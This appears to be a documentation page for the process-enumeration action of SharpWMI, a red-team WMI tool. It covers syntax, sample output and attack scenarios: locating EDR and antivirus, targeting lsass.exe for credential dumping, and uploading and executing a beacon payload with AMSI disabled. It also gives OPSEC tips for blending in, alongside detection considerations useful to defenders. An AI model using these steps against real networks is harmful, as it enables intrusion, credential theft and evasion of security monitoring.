Skip to main content

Overview

The ps action enumerates running processes on local and remote systems, including process ID, name, owner, and command line. It queries the Win32_Process WMI class and invokes the GetOwner method to retrieve process ownership information.

Syntax

SharpWMI.exe action=ps [computername=HOST[,HOST2,...]] [username=DOMAIN\user] [password=Password]

Parameters

ParameterRequiredDescription
actionYesMust be ps
computernameNoTarget host(s), comma-separated. Defaults to localhost
usernameNoUsername for authentication
passwordNoPassword for authentication

Usage Examples

SharpWMI.exe action=ps

Example Output

   PID |                           Name |                     Owner | CommandLine
------+--------------------------------+---------------------------+------------------------------------------
  1234 |                   chrome.exe   |         DOMAIN\jdoe       | "C:\Program Files\Google\Chrome\Application\chrome.exe"
  5678 |                 powershell.exe |    DOMAIN\Administrator   | powershell.exe -NoProfile -ExecutionPolicy Bypass
  9012 |                      cmd.exe   |         DOMAIN\jdoe       | cmd.exe
  3456 |                  explorer.exe  |         DOMAIN\jdoe       | C:\Windows\Explorer.EXE
   748 |                   svchost.exe  |    NT AUTHORITY\SYSTEM    | C:\Windows\system32\svchost.exe -k NetworkService

Output Fields

FieldDescription
PIDProcess ID
NameProcess executable name
OwnerDomain\Username running the process
CommandLineFull command line with arguments

Operational Use Cases

Scenario 1: Hunt for Admin Processes

# Look for admin-owned processes
SharpWMI.exe action=ps computername=workstation.domain.com
Identify:
  • Processes owned by domain admins
  • Privileged service accounts
  • SYSTEM-owned processes
  • Interactive admin sessions

Scenario 2: Detect Security Tools

# Enumerate processes on target
SharpWMI.exe action=ps computername=target.domain.com
Look for:
  • AV processes (MsMpEng.exe, AvastSvc.exe)
  • EDR agents (CrowdStrike, Carbon Black)
  • Monitoring tools (Sysmon)
  • PowerShell activity

Scenario 3: Identify Credential Sources

# Check for credential-rich processes
SharpWMI.exe action=ps computername=target.domain.com username="DOMAIN\admin" password="Password123!"
Target processes:
  • lsass.exe (credential dumping)
  • Browser processes (saved passwords)
  • Password managers (KeePass, 1Password)
  • Database connections

Scenario 4: Post-Exploitation Verification

# Verify payload execution
SharpWMI.exe action=upload computername=target source="beacon.exe" dest="C:\temp\svc.exe" amsi=disable
SharpWMI.exe action=exec computername=target command="C:\temp\svc.exe"
SharpWMI.exe action=ps computername=target
Confirm:
  • Beacon is running
  • Process ID and owner
  • Command line arguments
  • Parent process

Remote vs Local Usage

  • Local Enumeration
  • Remote Enumeration
SharpWMI.exe action=ps
When to use:
  • Post-exploitation enumeration
  • Local process discovery
  • No remote access available
Advantages:
  • No network traffic
  • No authentication required
  • Faster execution

Detection Considerations

  • WMI queries for Win32_Process class
  • GetOwner method invocations
  • Event ID 5857: WMI activity
  • Sysmon Event ID 19-21: WMI operations
  • Process enumeration across multiple systems
  • Queries from non-administrative hosts
  • Bulk queries in short timeframe
  • Correlation with other enumeration
  • WMI/DCOM traffic on port 135
  • Multiple connections from single source

Best Practices

Operational Security

  • Limit query frequency
  • Blend with legitimate admin activity
  • Use during business hours
  • Avoid bulk enumeration

Data Analysis

  • Filter system processes
  • Focus on user-owned processes
  • Look for unusual command lines
  • Identify high-value targets

Filtering Process Output

Since SharpWMI returns all processes, you may want to filter results. Here are common targets:

Interesting Processes

  • PowerShell: powershell.exe, pwsh.exe
  • Credential Access: lsass.exe, mstsc.exe
  • Security Tools: MsMpEng.exe, cb.exe, falcon-sensor.exe
  • Browsers: chrome.exe, firefox.exe, msedge.exe
  • Shells: cmd.exe, conhost.exe

Troubleshooting

Cause: Insufficient privilegesSolution:
  • Use username and password parameters
  • Verify admin rights on target
  • Check UAC remote restrictions
Cause: GetOwner method failedSolution:
  • Some system processes don’t have owners
  • This is normal for SYSTEM processes
  • Check permissions if user processes show empty
Cause: Network or service issueSolution:
  • Verify target is online
  • Check firewall rules
  • Ensure WMI service is running

terminate

Kill processes by name or PID

query

Custom process queries

exec

Create new processes

loggedon

Enumerate logged-on users

Alternative Query Methods

SharpWMI.exe action=query computername=target query="SELECT ProcessId,Name,CommandLine FROM Win32_Process WHERE Name='powershell.exe' OR Name='cmd.exe'"

SharpWMI.exe action=query computername=target query="SELECT ProcessId,Name FROM Win32_Process WHERE ExecutablePath LIKE '%temp%'"

SharpWMI.exe action=query computername=target query="SELECT ProcessId,Name FROM Win32_Process WHERE PercentProcessorTime > 50"